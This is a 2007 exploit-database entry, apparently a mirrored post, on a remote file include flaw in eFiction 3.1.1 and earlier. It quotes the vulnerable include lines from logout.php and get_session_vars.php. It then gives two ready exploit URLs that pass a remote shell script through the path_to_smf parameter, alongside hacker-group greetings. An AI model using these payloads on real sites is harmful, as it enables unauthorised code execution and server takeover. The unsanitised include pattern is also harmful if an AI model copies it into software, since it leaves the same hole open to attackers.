eFiction <= 3.1.1 (path_to_smf) Remote File Include Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : eFiction <= 3.1.1 (path_to_smf) Remote File Include Vulnerabilities
# Published : 2007-02-22
# Author : ThE dE@Th
# Previous Title : Sinapis Forum 2.2 (sinapis.php fuss) Remote File Include Vulnerability
# Next Title : FlashGameScript 1.5.4 (index.php func) Remote File Include Vulnerability

********************************************************************************
To ConTacT mE @ www.Asb-May.net/bb
ScRiPt:-http://www.efiction.org/downloads/eFiction31.zip
GrEaTz To:-ToOofa-HaCk.eGy (All AsB-MaY DisCoverY ExPloIts GrOup)
Discovered By:- ThE dE@Th <<{AsB-MaY DiScOvEr ExPlIoTs Gr0uP}   >>
******************************************************************************
logout.php:-
include_once($path_to_smf."Sources/Subs-Auth.php");

get_session_vars.php:-
require_once($path_to_smf."SSI.php");
********************************************************************************
ExPlOiT:-http://www.SitE.com/bridges/SMF/logout.php?path_to_smf=[Shell]
ExPlOiT:-http://www.SitE.com/get_session_vars.php?path_to_smf=[Shell]
********************************************************************************

# www.Syue.com [2007-02-22]